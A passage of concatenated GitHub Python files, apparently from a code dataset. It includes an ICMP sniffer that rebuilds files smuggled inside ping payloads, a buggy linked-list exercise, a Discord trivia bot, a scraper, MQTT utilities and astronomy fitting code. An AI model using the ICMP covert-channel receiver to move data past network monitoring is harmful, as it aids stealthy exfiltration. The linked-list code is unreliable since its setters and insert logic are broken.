'{}'\".format(filename))\n\tprint(\"2: '{}'\".format(os.path.splitext(os.path.basename(filename).rstrip())[0]))\n\tprint(\"3: '{}'\".format(str(packet[IP].src)))\n\n\tprint(\"zob{}_az{}_er{}_ty{}\".format(os.path.splitext(os.path.basename(filename).rstrip())[0] , str(packet[IP].src) , datetime.now().strftime('%Y%m%d%H%M%S') , os.path.splitext(os.path.basename(filename).rstrip())[1]))\n\tprint(\"TOS : '{}'\".format(packet.tos))\n\tif last_tos == 0 and packet.ttl > 100:\n\t\tfilename = packet[ICMP].load[-len(packet[ICMP].load):].decode()\n\n\telif last_tos > 100 and packet.ttl > 100:\n\t\tfilename += packet[ICMP].load[-len(packet[ICMP].load):].decode()\n\telif last_tos > 100 and packet.ttl > 60:\n\t\tfilename = os.path.splitext(os.path.basename(filename).rstrip())[0] + \"_\" + str(packet[IP].src) + \"_\" + datetime.now().strftime('%Y%m%d%H%M%S') + os.path.splitext(os.path.basename(filename).rstrip())[1]\n\t\tprint(\"Receiving file {}\".format(filename))\n\t\tpayload = packet[ICMP].load[-len(packet[ICMP].load):]\n\t\ttransfered_bytes += len(payload)\n\t\tprint(\"{} bytes transfered\".format(transfered_bytes)),\n\telif last_tos > 60 and packet.ttl > 60:\n\t\tprint(\"6: '{}'\".format(payload))\n\t\tprint(\"7: '{}'\".format(packet[ICMP].load))\n\n\t\tpayload += packet[ICMP].load[-len(packet[ICMP].load):]\n\t\ttransfered_bytes += len(payload)\n\t\tprint(\"\\r{} bytes transfered\".format(transfered_bytes)),\n\n\tsys.stdout.flush()\n\n\tlast_tos = packet.ttl\n\n\tif packet.ttl <= 60:\n\t\tprint(\"\\r\\nWriting payload to file ({})...\".format(filename)),\n\t\tprint(\"5: '{}'\".format(filename))\n\t\twith open(filename, \"wb\") as fh:\n\t\t#fh = open(filename,\"w+\")\n\t\t\tfh.write(payload)\n\t\n\t\tprint(\"done!\")\n\t\tprint(\"4: '{}'\".format(payload))\n\t\tlast_tos = 0\n\n\nif len(sys.argv) == 1:\n print(\"Sniffing on all interfaces.\")\nelse:\n if sys.argv[1] == \"-h\":\n print(\"Usage: {0} []. Example: {0} eth0\".format(sys.argv[0]))\n exit()\n else:\n print(\"Sniffing interface: {}.\".format(sys.argv[1]))\n\nsniff(filter=\"inbound and icmp[icmptype] == 8\", prn=process_packet)\n","repo_name":"Joritz/SecuOS","sub_path":"hello/receiver2.py","file_name":"receiver2.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14853405889","text":"#!/usr/bin/python3\n\"\"\"This module contains an implementation of a node and Singly linked list.\"\"\"\n\n\nclass Node:\n def __init__(self, data, next_node=None):\n self.__data = data\n self.__next_node = next_node\n\n @property\n def data(self):\n return self.__data\n\n @data.setter\n def data(self, value):\n self.__data = value\n\n @property\n def next_node(self):\n return self.__next_node\n\n @data.setter\n def data(self, value):\n self.__next_node = value\n\n\nclass SinglyLinkedList:\n def __init__(self):\n self.__head = None\n\n def sorted_insert(self, value):\n if self.__head is None:\n new_node = Node(value)\n self.__head = new_node\n else:\n copy = self.__head\n print(\"head\", self.__head)\n while copy is not None:\n print(f\"inserting {value}\")\n if copy.data > value:\n new_node = Node(value, copy)\n print(\"newnode\", new_node)\n copy = new_node\n break\n if copy.next_node is None:\n new_node = Node(value)\n copy.next_node = new_node\n break\n print(\"copy\", copy)\n\n def __str__(self):\n if self.__head is None:\n return\n str_rep = \"\"\n while self.__head is not None:\n str_rep += \"{:d}\".format(self.__head.data)\n if self.__head.next_node is not None:\n str_rep += \"\\n\"\n self.__head = self.__head.next_node\n return str_rep\n\n\nsll = SinglyLinkedList()\nsll.sorted_insert(2)\nsll.sorted_insert(5)\nsll.sorted_insert(3)\nsll.sorted_insert(10)\nsll.sorted_insert(1)\nsll.sorted_insert(-4)\nsll.sorted_insert(-3)\nsll.sorted_insert(4)\nsll.sorted_insert(5)\nsll.sorted_insert(12)\nsll.sorted_insert(3)\nprint(sll)\n","repo_name":"Ayobami0/alx-higher_level_programming","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36113920418","text":"from attribute_image_maker import ImageAttributes\n\n\ndef image_features(rgb_image, num_block):\n features = []\n width = rgb_image.shape[1]\n height = rgb_image.shape[0]\n block_width = width//num_block[0]\n block_height = height//num_block[1]\n\n for y in range(0, height - block_height + 1, block_height):\n for x in range(0, width - block_width + 1, block_width):\n img_block = rgb_image[y:y+block_height, x:x+block_width]\n attr = ImageAttributes(img_block)\n block_features = attr.get_attributes()\n features.extend(block_features)\n return features\n","repo_name":"lobkovilya/PostprocessingImageChecking","sub_path":"TrainingSet/GeneratingScripts/tests/python/feature_generator.py","file_name":"feature_generator.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72696012254","text":"from logging import error\r\nimport discord\r\nfrom discord import client\r\nfrom discord import message\r\nfrom discord.ext import commands\r\nimport urllib.request, json\r\nimport json\r\nfrom discord.utils import async_all\r\nfrom discord.webhook import AsyncWebhookAdapter\r\nfrom types import SimpleNamespace\r\nimport time\r\nimport csv\r\nimport os\r\nfrom discord import FFmpegPCMAudio\r\nfrom discord import TextChannel\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nimport requests\r\nimport re\r\nimport random\r\n\r\n# ------ #TODO# ------\r\n# Stop music when game end. (needs ctx)\r\n# Loop through questions.... (creates a bug with on_reaction_add - too many things for a single message)\r\n#\r\n\r\nintents = discord.Intents.default()\r\nintents.members = True\r\nclient = commands.Bot(command_prefix='.',intents=intents)\r\n# client.remove_command('help')\r\n\r\n# List of categories\r\ncategory_dict = {'General Knowledge' : 9, 'Books' : 10, 'Film' : 11, 'Music' : 12, 'Musicals & Theatres' : 13, 'Television' : 14 ,'Video Games' : 15\r\n,'Board Games' : 16,'Science & Nature' : 17,'Computer Science' : 18,'Mathematics' :19 ,'Mythology' : 20 ,'Sports' : 21, 'Geography' : 22,'History':23\r\n,'Politics':24,'Art':25,'Celebrities' :26,'Animals':27,'Vehicles':28,'Anime':31}\r\n\r\n\r\n@client.command()\r\nasync def categories(ctx):\r\n await ctx.send(\"The following categories are available for trivia\")\r\n await ctx.send(\"General Knowledge\\nBooks\\nFilm\\nMusic\\nMusicals & Theatres\\nTelevision\\nVideo Games\\nBoard Games\\nScience & Nature\\nComputer Science\")\r\n await ctx.send(\"Mathematics\\nMythology\\nSports\\nGeography\\nHistory\\nPolitics\\nArt\\nCelebrities\\nAnimals\\nVehicles\\nAnime\")\r\n\r\n#***********************************************#\r\n\r\n@client.command()\r\nasync def sus(ctx):\r\n await ctx.send(\"Sacha\")\r\n\r\n@client.command()\r\nasync def tom(ctx):\r\n await ctx.send(\"I failed math three times!! \\n0-5 btw\")\r\n\r\n #mateus\r\n@client.command()\r\nasync def antivax(ctx):\r\n await ctx.send(\"Mateus : GoVerNment is GonNA CoNtRoL mE\")\r\n\r\n#******************************************************************#\r\n\r\n@client.event\r\nasync def on_ready():\r\n clients = []\r\n\r\n cwd = os.getcwd()\r\n\r\n # Create file \"classroom(number).txt\"\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n txt_file = open(file_name, \"w\")\r\n\r\n #\r\n clients_file = open(\"clients.txt\",\"w\",encoding=\"utf-8\")\r\n for member in client.get_all_members():\r\n member_data = member.name\r\n raw_data = member_data+','+\"0\"+',,'\r\n try:\r\n txt_file.write(str(raw_data)+'\\n')\r\n except:\r\n print(member.name + \"Cant play lol\")\r\n\r\n\r\n txt_file.close()\r\n\r\n resp = \"Data file generated\"\r\n print(resp)\r\n\r\n'''\r\n for member in \r\n clients += member\r\n print(member)\r\n print(clients)\r\n '''\r\n\r\n@client.command()\r\nasync def getmember(ctx):\r\n username = ctx.message.author.name\r\n if(str(username) == \"TheMemer27\"):\r\n member_list = ''\r\n for member in ctx.guild.members:\r\n member_list += member.name\r\n print(member.name)\r\n await ctx.send(member.name)\r\n\r\n else:\r\n await ctx.send(\"Youre not admin\")\r\n\r\n# Greet new suer\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n print(f'{member} has joined a server.')\r\n\r\n#Send message when a user leaves\r\n\r\n@client.event\r\nasync def on_member_remove(member):\r\n print(f'{member} has left a server.')\r\n\r\n# Respond with latency in ms\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n await ctx.send(f\"pong: {round(client.latency*1000)}ms\" )\r\n\r\n# respond to Hi\r\n\r\n@client.command()\r\nasync def hi(ctx):\r\n await ctx.send(\"Hello I am BeanerBot.\")\r\n\r\n\r\n# command to stop voice\r\n@client.command()\r\nasync def leave(ctx):\r\n voice = discord.utils.get(client.voice_clients, guild=ctx.guild)\r\n if voice.is_connected():\r\n await voice.disconnect()\r\n else:\r\n await ctx.send(\"The bot is not connected to a voice channel.\")\r\n# Start a game of trivia\r\n\r\n@client.command()\r\nasync def trivia(ctx,args):\r\n global category_dict\r\n print(\"Passed argument: \" + args)\r\n\r\n if category_dict.get(args):\r\n url = 'https://opentdb.com/api.php?amount=1&category='+str(category_dict.get(args)) +'&difficulty=medium&type=multiple'\r\n req = urllib.request.Request(url)\r\n\r\n try:\r\n ##parsing response\r\n r = urllib.request.urlopen(req).read()\r\n cont = json.loads(r.decode('utf-8'), object_hook=lambda d: SimpleNamespace(**d))\r\n counter = 0\r\n channel = ctx.message.author.voice.channel\r\n voice = get(client.voice_clients, guild=ctx.guild)\r\n if voice and voice.is_connected():\r\n await voice.move_to(channel)\r\n else:\r\n voice = await channel.connect()\r\n\r\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\r\n FFMPEG_OPTIONS = {\r\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\r\n voice = get(client.voice_clients, guild=ctx.guild)\r\n\r\n song = \"https://www.youtube.com/watch?v=PCIvOGveIK0\"\r\n if not voice.is_playing():\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n info = ydl.extract_info(song, download=False)\r\n song_URL = info['url']\r\n voice.play(FFmpegPCMAudio(song_URL, **FFMPEG_OPTIONS))\r\n voice.is_playing()\r\n except Exception as e:\r\n print(e)\r\n #await ctx.send(\"For music, join a channel!\")\r\n\r\n for question in cont.results:\r\n counter += 1\r\n print(\"Category:\" + args +\"\\n Question:\"+question.question+ \"\\nAwnsers:\"+ str(question.incorrect_answers))\r\n print(\"____________\")\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.green()\r\n )\r\n embed.title= 'Trivia!'\r\n embed.add_field(name=\"Category\", value=(args), inline=\"False\")\r\n embed.add_field(name=\"Type\", value=(question.type), inline=\"False\")\r\n embed.add_field(name=\"Difficulty\", value=(question.difficulty), inline=\"False\")\r\n message = await ctx.send(embed=embed)\r\n i = 1\r\n while i > 0:\r\n\r\n time.sleep(1)\r\n\r\n embed.title= ('Trivia! '+f\"{i}s\")\r\n \r\n await message.edit(embed=embed)\r\n i -= 1\r\n\r\n\r\n embed.title= ('Trivia! Starting...')\r\n\r\n await message.edit(embed=embed)\r\n\r\n await message.delete()\r\n\r\n embed2 = discord.Embed(\r\n color=discord.Color.green()\r\n ) \r\n\r\n embed2.title= 'Trivia!'\r\n embed2.title= question.question\r\n embed2.add_field(name=(\"🅰 : \"+str(question.incorrect_answers[0])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"🅱️ : \"+str(question.incorrect_answers[1])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"© : \"+str(question.incorrect_answers[2])), value=\"_______\", inline=\"False\")\r\n embed2.add_field(name=(\"🌹 : \"+str(question.correct_answer)), value=\"_______\", inline=\"False\")\r\n\r\n message2 = await ctx.send(embed=embed2)\r\n \r\n await message2.add_reaction(\"🅰\" )\r\n await message2.add_reaction(\"🅱️\")\r\n await message2.add_reaction(\"©\")\r\n await message2.add_reaction(\"🌹\")\r\n\r\n else:\r\n await ctx.send(\"Invalid Category!\")\r\n\r\n\r\ndef save(user,credits):\r\n cwd = os.getcwd()\r\n\r\n # Open file \"clients.txt\" and save to a list\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n #txt_file = open(file_name, \"r+\")\r\n\r\n with open('clients.txt', newline='') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\n print(\"Opened File.... Saved to data\")\r\n f.close()\r\n\r\n print(\"Passed variable: \"+user)\r\n\r\n i = 0\r\n\r\n for name in data:\r\n\r\n client = re.sub(r'\\W+', '', name[0])\r\n #print(client)\r\n if client == user:\r\n print(name[1])\r\n print(\"Found user\")\r\n \r\n socialCredits = int(name[1])\r\n print(name[1])\r\n socialCredits += credits\r\n print(socialCredits)\r\n name[1] = socialCredits\r\n\r\n ##name[1] = credits\r\n \r\n print(name)\r\n break\r\n \r\n i+=1\r\n\r\n #\r\n clients_file = open(\"clients.txt\",\"r+\",encoding=\"utf-8\")\r\n\r\n with open('clients.txt', 'r+') as f:\r\n\r\n for name in data:\r\n\r\n s = \",\"\r\n #s = s.join(name)\r\n converted_list = [str(element) for element in name]\r\n joined_string = \",\".join(converted_list)\r\n clients_file.write(joined_string+'\\n')\r\n\r\n\r\n clients_file.close()\r\n \r\n@client.command()\r\nasync def credits(ctx):\r\n cwd = os.getcwd()\r\n\r\n # Open file \"clients.txt\" and save to a list\r\n file_name = os.path.join(cwd, \"clients.txt\")\r\n\r\n #txt_file = open(file_name, \"r+\")\r\n\r\n with open('clients.txt', newline='') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\n f.close()\r\n\r\n print(\"Passed variable: \"+ctx.message.author.name)\r\n\r\n i = 0\r\n\r\n for name in data:\r\n\r\n client = re.sub(r'\\W+', '', name[0])\r\n #print(client)\r\n if client == ctx.message.author.name:\r\n print(name[1])\r\n print(\"Found user\")\r\n \r\n socialCredits = int(name[1])\r\n print(name[1])\r\n\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.gold()\r\n ) \r\n embed.title = 'Bank'\r\n embed.add_field(name=(str(ctx.message.author.name)), value=\"You have \"+name[1]+ \" social credits.\", inline=\"False\")\r\n\r\n await ctx.send(embed=embed)\r\n \r\n print(name)\r\n break\r\n \r\n i+=1\r\n\r\n\r\n\r\n@client.command()\r\nasync def test(ctx):\r\n username = ctx.message.author.name\r\n if(str(username) == \"TheMemer27\" or str(username) == \"AODA\"):\r\n save(str(username),50)\r\n\r\n else:\r\n await ctx.send(\"Youre not admin\")\r\n\r\n \r\n@client.event\r\nasync def on_reaction_add(reaction, user):\r\n user_list = []\r\n if str(user) not in user_list:\r\n user_list += [user]\r\n else:\r\n print(\"=--=--=-=-=- DUPLICATED =-=-=-=-=\")\r\n \r\n reactions = reaction.message.reactions\r\n # DO WHAT YOU WANT HERE \r\n if(str(user) != \"BeanerBot#0361\"):\r\n\r\n print(str(user) +\"\\t \"+ str(reaction))\r\n\r\n if(str(reaction) == \"🌹\"):\r\n if (user_list[0] == user):\r\n\r\n print(\"=========== WINNER MESSAGGE ===============\")\r\n\r\n #await reaction.message.delete()\r\n \r\n embed = discord.Embed(\r\n color=discord.Color.green()\r\n ) \r\n embed.title = 'Winner'\r\n embed.add_field(name=(str(user)), value=\"Has won 50 Social Credits!\", inline=\"False\")\r\n\r\n await reaction.message.edit(embed=embed)\r\n\r\n await reaction.message.clear_reaction(\"🅰\")\r\n await reaction.message.clear_reaction(\"🅱️\")\r\n await reaction.message.clear_reaction(\"©\")\r\n await reaction.message.clear_reaction(\"🌹\")\r\n\r\n a_string = str(user)\r\n split_string = str(a_string).split(\"#\", 1)\r\n\r\n substring = split_string[0]\r\n print(substring)\r\n\r\n save(str(substring),50)\r\n\r\n \r\n else:\r\n print(\"=========== GAME END ===============\")\r\n\r\n #await reaction.message.delete()\r\n \r\n embed = discord.Embed(\r\n color=discord.Color.red()\r\n ) \r\n embed.title = 'Looser'\r\n embed.add_field(name=(str(user)), value=\"Hold this: L\", inline=\"False\")\r\n\r\n await reaction.message.edit(embed=embed)\r\n\r\n await reaction.message.clear_reaction(\"🅰\")\r\n await reaction.message.clear_reaction(\"🅱️\")\r\n await reaction.message.clear_reaction(\"©\")\r\n await reaction.message.clear_reaction(\"🌹\")\r\n\r\nclient.run('YOUR_KEY_HERE')\r\n","repo_name":"CarlosR4/DiscordBot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":12456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23151488299","text":"#################\n## FDA - GET LINKS - Scraper\n## 07/08/20\n## DJ Edwards\n#################\nimport scrapy\n\nclass getLinks_FDA(scrapy.Spider):\n name = \"FDA_links\"\n\n start_urls = ['https://www.fda.gov/emergency-preparedness-and-response/counterterrorism-and-emerging-threats/coronavirus-disease-2019-covid-19'\n ]\n\n def parse(self, response):\n filename = 'all_FDA_links.txt'\n links = response.css('p a::attr(href)').getall()\n with open(filename,'a') as f:\n f.write(','.join(links))","repo_name":"djEdwards/Government-Scraper","sub_path":"government_covid19/government_covid19/spiders/getLinks_FDA.py","file_name":"getLinks_FDA.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15683303257","text":"# MQTT-Utils.py\n# library of routines to assist with using getting IoT data, \n# then using MQTT protocol to manipulate it,\n# particularly for use in the Cayenne Cloud.\n# Consolidated from https://github.com/SteveCossy/IOT\n# Started 09 Jan 2020 by Steve Cosgrove\n\nimport csv, sys, os, json, webbrowser, time, datetime, logging, string\nfrom collections import OrderedDict\n\ndef HelpMessage():\n print(\"You need help! Try https://github.com/SteveCossy/IOT/wiki\")\n\n\ndef DegMin2DegDeci(Location,Direction):\n# Change Degrees.Minutes to Degrees.DecimalPartOfDegrees\n# Location is a Degrees.Minutes float\n# Direction is North South East or West\n# Whole,Deci = divmod(float(Location),1)\n Whole,DeciShifted = str(Location).split('.')\n Deci = int(DeciShifted) / (10**len(DeciShifted))\n DecDeci = float(Whole+ str( Deci / 0.60 ).lstrip('0'))\n if Direction == 'W' or Direction == 'S':\n DecDeci *= -1\n return (DecDeci)\n\ndef PiSerial ():\n# Preference is a string saying whether our preference is tty or USBx\n# Assumes tehre will only be one onboard serial port\n# Based on https://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python\n# ... and https://stackoverflow.com/questions/54288475/pyserial-module-serial-has-no-attribute-tools/54288652\n# ... and https://pyserial.readthedocs.io/en/latest/tools.html\n# GPIO serial port is not detected. See https://github.com/SteveCossy/IOT/wiki/Serial-Port-Use\n# https://raspberrypi.stackexchange.com/questions/45570/how-do-i-make-serial-work-on-the-raspberry-pi3-or-later-model/45571#45571\n\n from serial.tools import list_ports\n\n Ports = list_ports.comports(include_links=False)\n Devices = {}\n\n for Port in Ports :\n Device = Port.device\n if ('USB' in Device):\n USBnbr = Device[-4:]\n Devices[USBnbr] = Device\n# else:\n# Devices['Onboard'] = Device Always returns /dev/ttyAMA0 no not helpful\n return Devices\n\ndef DataError(Device, Channel, textMessage, PacketIn):\n CrLf = '\\r\\n'\n print (\"Device: \",Device,CrLf \\\n ,\"Channel: \",Channel,CrLf \\\n ,\"Message: \",textMessage,CrLf \\\n ,\"Packet Recieved: '\"+str(PacketIn)+\"'\" \\\n )\n\ndef Save2CSV (CSVPath, Device, Channel, Data):\n# CSVPath String: is folder for the file (filename to be made from device & channel)\n# Device is a unique ID. Perhaps the very long Cayenne Device ID\n# Channel unique letter used to distiguish different sensors on same device\n# ref https://github.com/SteveCossy/IOT/wiki/Tables-defining:-Cayenne-Data-Channels---PicAxe-Channels---Cicadacom\n# Data what we are going to write.\n\n# import datetime\n CurrentTime\t= datetime.datetime.now().isoformat()\n CSV\t\t= '.csv'\n CSVFile\t= str(Device)+\"_\"+str(Channel)+CSV\n CrLf \t= '\\r\\n'\n CSVPathFile\t= os.path.join(CSVPath, CSVFile)\n FIELDNAMES\t= ['time','device','data']\n\n DATALIST = {'time':CurrentTime,\n\t\t'device':Device,\n\t\t'data':Data\n\t\t}\n print ( 'Save2CSV', DATALIST )\n # Needs thinking about further - test type, as it could also be a list\n\n if not os.path.isfile(CSVPathFile):\n # There is not currently an output file\n print (\"Creating new output file: \"+CSVPathFile)\n if not os.path.exists(CSVPath):\n os.mkdir(CSVPath)\n with open(CSVPathFile, 'w') as CSVFile:\n writer = csv.DictWriter(CSVFile, fieldnames=FIELDNAMES)\n writer.writeheader()\n with open(CSVPathFile, 'a') as CSVFile:\n writer = csv.DictWriter(CSVFile, fieldnames=FIELDNAMES)\n writer.writerow(DATALIST)\n return CSVPathFile\n\n\ndef Save2Cayenne (client, Channel, Data, Divisor):\n# Client is an open MQTT client object\n# Channel is the Cayenne channel letter for the data\n# Data is a data type appropriate for that type of channel\n# ref https://github.com/SteveCossy/IOT/wiki/Tables-defining:-Cayenne-Data-Channels---PicAxe-Channels---Cicadacom\n\n# Define the PicAxe Channels\n ChannelMap = dict.fromkeys(string.ascii_uppercase)\t# Keys are 'A' 'B' 'C' 'D'\n for key in ChannelMap :\n ChannelMap[key]\t\t= ord(key)-64\t\t# A=1 B=2 etc\n\n# Add other arbatory Channels\n ChannelMap['CPUtemp']\t = 41\n ChannelMap['Stat']\t\t = 40\n ChannelMap['ExtTemp']\t = 47\n ChannelMap['WifiLvl']\t = 46\n ChannelMap['WifiLnk']\t = 45\n ChannelMap['DiskAvg']\t = 44\n ChannelMap['LoadAvg']\t = 43\n ChannelMap['PengDetect'] = 48\n ChannelMap['ErrCount'] = 49\n\n print ( 'Save2Cayenne', Channel+':(',ChannelMap[Channel],')' \\\n , 'Data:', Data )\n\n if Channel in ChannelMap:\n Data = Data / Divisor\n client.virtualWrite( ChannelMap[Channel], Data, \"analog_sensor\", \"null\")\n else:\n print( \"********* Channel \"+Channel+\" not found! **************\")\n client.loop()\n \ndef to_geojson(InputFile, OutputFile):\n \"\"\"Convert CSV file to GeoJSON\"\"\"\n\n li = []\n with open(InputFile, 'r') as CsvFile:\n # dialect = csv.Sniffer().sniff(CsvFile.read(1024))\n reader = csv.reader(CsvFile, delimiter=',')\n next(reader) # skip header\n # reader = csv.reader(CsvFile, dialect)\n for TIME,RSSI,LAT,LONG in reader:\n d = OrderedDict()\n d['type'] = 'Feature'\n d['properties'] = {\n 'TimeStamp': TIME,\n 'RSSI': RSSI,\n 'Lat' : LAT,\n 'Long': LONG\n }\n d['geometry'] = {\n 'type': 'Point',\n 'coordinates': [float(LONG), float(LAT)]\n # 'coordinates': [Latitude, Longitude]\n }\n li.append(d)\n\n # print( 'Writing '+OutputFile )\n\n d = OrderedDict()\n d['type'] = 'FeatureCollection'\n d['features'] = li\n with open(OutputFile, 'w') as f:\n f.write(json.dumps(d, sort_keys=False, indent=4))\n\n# webbrowser.open('http://net-informations.com', new=2)\n\n# NewURL = 'http://students.pcsupport.ac.nz/OSM/?'+OutputFile\n# os.system(\"echo \"+NewURL+\" >NewURL.url\")\n# webbrowser.open(NewURL, new=2)\n\n# This script is not intended to be called on the command line.\n# If it is called that way, then it will give a help message and exit\nif __name__ == '__main__':\n HelpMessage()","repo_name":"SteveCossy/IOT","sub_path":"LoRaReAd/MQTTUtils.py","file_name":"MQTTUtils.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"70531040094","text":"class Node:\n def __init__(self,data=None):\n self.data=data\n self.next=None\n\nn1=Node(11)\nn2=Node(21)\nn3=Node(31)\nn4=Node(41)\nn5=Node(51)\nn6=Node(61)\n\nn1.next=n2\nn2.next=n3\nn3.next=n4\nn4.next=n5\nn5.next=n6\nn6.next=None\n\nprev=None\ncurr=n1\nnext=n1.next\n\nwhile curr is not None:\n curr.next=prev\n prev=curr\n curr=next\n if next is not None:\n next=next.next\n\nhead=prev\n\nwhile head is not None:\n print(head.data,end=\" \")\n head=head.next\nprint()","repo_name":"kai-subramanian/Algorithms-and-Data-Structures","sub_path":"Python/Data Structures/reverseLL.py","file_name":"reverseLL.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15319865514","text":"import numpy as np\nimport astropy\nimport copy as copy\nimport os\n\nfrom . import ComparisonPlot as CP\n\"\"\"\n This module contains routines needed to compare a number of Barolo and FAT fits to a given galaxy with each other. It contains the routines:\n FitComparisonFunctions --> This function makes a dictionary of other functions that may be useful in other modules.\n MakeFitComparisonsFolder --> This function makes a folder to hold the comparison plots.\n CompareFits --> This function does the actual fit comparisons.\n GetFits --> This function loads in all the different fits into an array of tilted ring dictionaries.\n GetBaroloFit --> This loads in a Barolo fit as a tilted ring dictionary\n GetFATFits --> This loads in a FAT fit as a pair of tilted ring dictionaries.\n\"\"\"\n\ndef FitComparisonFunctions():\n \"\"\"\n This function makes a dictionary of other functions for ease in passing to other modules.\n \"\"\"\n CompareFncs={'GetAllFits':GetFits,'GetBaroloFit':GetBaroloFit,'GetFATFit':GetFATFits}\n return CompareFncs\n \ndef MakeFitComparisonsFolder(FolderDict):\n \"\"\"\n This module makes a folder to holder the comparison plots\n \"\"\"\n os.makedirs(FolderDict['FitsComparisionFolder'], exist_ok=True)\n\ndef CompareFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions):\n \"\"\"\n This function does the comparison between multiple Barolo and FAT fits and makes a diagnostic plot\n \"\"\"\n # First load in and analyze the sofia cubelet for comparisons later on. The load-in routine is found in CubeLoad/CubeAnalysis.py\n CubeInfo=AnalysisFncs['CubeFnc']['SoFiA_CubeAnalysis'](ObjDict)\n # Add in the object name from the cube file to the object dictionary\n # Try to get the name of the galaxy from the cube header (but replace spaces with underscores)\n try:\n ObjDict['ObjName_From_Cube']=CubeInfo['CubeHeader']['OBJECT'].replace(' ','_')\n # If this doesn't work, use the underscored name from the catalogue.\n except:\n ObjDict['ObjName_From_Cube']=ObjDict['ObjName_Underscored']\n # Load all the fits into an array of Tilted-ring dictionaries\n FitParams=GetFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo)\n # Make a comparison plot\n CP.MakeComparisonPlot(ObjDict,FolderDict,CubeInfo,FitParams,FittingOptions,AnalysisFncs)\n\n\ndef GetFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo):\n \"\"\"\n This function loads in all the different fits into an array of tilted ring dictionaries.\n \"\"\"\n # Set the number of fit dictionaries that will be required\n FitParams=[None]*FittingOptions['nTotFits']\n # Initialize the fit counter\n FitNum=0\n # Loop through all Barolo Fits\n for i in range(FittingOptions['nBaroloFits']):\n # Load in the Barolo fit\n FitParams[FitNum]=GetBaroloFit(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,i)\n # Increase the number of dictionaries by 1\n FitNum+=1\n \n # Loop through all FAT fits\n for i in range(FittingOptions['nFATFits']):\n # Load in the FAT fit\n FitParams[FitNum],FitParams[FitNum+1]=GetFATFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,i)\n # Increase the counter by 2 as each FAT fit has 2 dictionaries.\n FitNum+=2\n # Return the array of dictionaries\n return FitParams\n\n\ndef GetBaroloFit(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,FitStep):\n \"\"\"\n This dictionary loads in a Barolo fit as a tilted ring dictionary\n \"\"\"\n # Load in the Barolo fit for the galaxy indicated by the ObjDict, using the particular fit that was run with the options set in the particular field (see ReleaseConfigurationOptions/). The load-in functions are found in BaroloAnalyis/BaroloModelAnalysis.py\n BaroloFit=AnalysisFncs['BaroloFnc']['LoadBaroloModel'](ObjDict,FolderDict,FittingOptions['BaroloAnalysisFolders'][FitStep],FittingOptions['BaroloLabels'][FitStep])\n # It is possible that the Barolo fit failed, and the load-in function returned the bad-fit dictionary. If it didn't fail (indicated by the FitAchieved flag) there are a few more things to do\n if BaroloFit['FITAchieved']:\n # Barolo gives the center in pixels, and some plots and calculations need this to be in RA and DEC, so get those values here.\n BaroloFit['RA'],BaroloFit['DEC']=AnalysisFncs['AstroFncs']['CalcRA_Dec_FromCube'](BaroloFit['XCENTER'],BaroloFit['YCENTER'],CubeInfo)\n # If the fit was successful, compare an MCG realization of the parameters to the data cube\n BaroloFit=AnalysisFncs['ModelCompFncs']['CompareGeneralTiltedRingModel'](BaroloFit,CubeInfo,AnalysisFncs['MCGFncs'])\n # Return the BaroloFit tilted-ring dictionary.\n return BaroloFit\n \ndef GetFATFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,FitStep):\n \"\"\"\n This dictionary loads in a FAT fit as a pair of tilted ring dictionaries\n \"\"\"\n\n # Start by making a 2 element empty list to store the pair of dictionaries\n FATFit=[None]*2\n # Load in the FAT fit for the galaxy indicated by the ObjDict, using the particular fit that was run with the options set in the particular field (see ReleaseConfigurationOptions/). The load-in functions are found in FATAnalyis/FATModelAnalysis.py\n FATFit[0],FATFit[1]=AnalysisFncs['FATFnc']['LoadFATModel'](ObjDict,FolderDict,FittingOptions['FATAnalysisFolders'][FitStep],FittingOptions['FATLabels'][FitStep])\n # It is possible that the FAT fit failed, and the load-in function returned the bad-fit dictionary. If it didn't fail (indicated by the FitAchieved flag) there are a few more things to do\n # Loop through both dictionaries\n for j in range(2):\n if FATFit[j]['FITAchieved']:\n # FAT returns the centroid in RA and DEC, which need to be converted to pixel X and Y values for some comparisons.\n 